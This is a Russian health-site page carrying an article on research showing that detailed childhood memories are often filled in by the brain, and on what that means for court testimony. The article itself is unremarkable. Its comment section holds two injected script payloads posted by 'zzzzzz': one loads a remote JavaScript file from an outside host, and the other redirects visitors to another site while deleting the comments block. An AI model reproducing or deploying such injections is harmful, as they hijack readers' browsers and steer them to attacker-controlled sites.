Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Все, что вы помните о дет...  >>  Все, что вы помните о детстве, – неправда
 
Обратная связь
 

Все, что вы помните о детстве, – неправда

Размер шрифта
01 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие из нас любят рассказывать истории из своего детства, сопровождая их множеством интересных подробностей и конкретных деталей. Однако ученым недавно удалось выяснить, что именно живописные детали могут быть на самом деле не реальными воспоминаниями, а лишь выдумками нашего мозга.

Все, что вы помните о детстве, – неправда

Три английских ученых-психолога попросили 127 человек рассказать о четырех наиболее ранних детских воспоминаниях, в правдивости которых они абсолютно уверены. Им также были заданы вопросы о конкретных деталях тех событий.

Когда результаты были проанализированы, ученые пришли к выводу, что участники эксперимента с большей вероятностью припоминали определенные детали («что», «где» и «когда»). Однако другие детали – о чем они думали в тот момент, какая была погода, сколько лет им было – вспоминались с куда меньшей частотой. Наиболее редко люди могли рассказать, в какое время дня произошло событие и во что они были одеты.

Это имеет важное значение, так как во многих случаях предполагаемого жестокого обращения с детьми часто единственным доказательством являются очень конкретные и детализированные воспоминания. Авторы исследования, Кристина Вэллс, Катриона Моррисон и Мартин Конвэй отмечают: «Присяжные обычно очень положительно относятся к таким чересчур детализированным рассказам о детстве. В Великобритании, к примеру, многие приговоры выносятся на основании такого рода доказательств. Так как для виновных срок наказания исчисляется в годах, причем иногда речь идет о десяти и более, вопрос о том, что взрослые люди в действительности могут вспомнить о детстве и насколько подробно, становится критически важным».

Обвинители часто используют тот факт, что их клиенты, уже будучи взрослыми людьми, могут вспомнить очень мелкие специфические детали и подробности событий из своего детства, как веское доказательство того, что эти события действительно происходили. Однако Вэллс и ее коллеги заявляют: «Не существует простой взаимосвязи между правдивостью воспоминаний и степенью их подробности и насыщенности деталями». Ученые приходят к выводу, что «определенная уверенность может быть в рассказах о том, кто, когда и что сделал; другие специфические детали вспоминаются с меньшей вероятностью». Также исследователи предполагают, что такие подробные детские воспоминания связаны с тем, что наш мозг бессознательно «заполняет пробелы» в нашей памяти деталями, которых мы на самом деле не помним.

Вэллс с коллегами уверены в том, что их работа имеет важное практическое значение. «Суды и другие организации, где рассказ человека о событиях прошлого являются важным доказательством, должны быть осведомлены о том, что вспоминается чаще всего, что – в редких случаях, а что вообще не совсем похоже на реальные воспоминания».

Это новое исследование дает работникам закона и многим другим специалистам правильное представление о воспоминаниях, чтобы помочь им отделить реальные факты из детства человека от его зачастую неосознанных выдумок.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:30

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
ЭКО не влияет на здоровье детей   Что порядок рождения говорит о вас   Сахар – это наркотик   Дети могут понимать друг друга без слов!  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Как правильно кормить грудью
Первые шаги вашего малыша
Как научить ребенка есть правильно. Что можно и нельзя

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.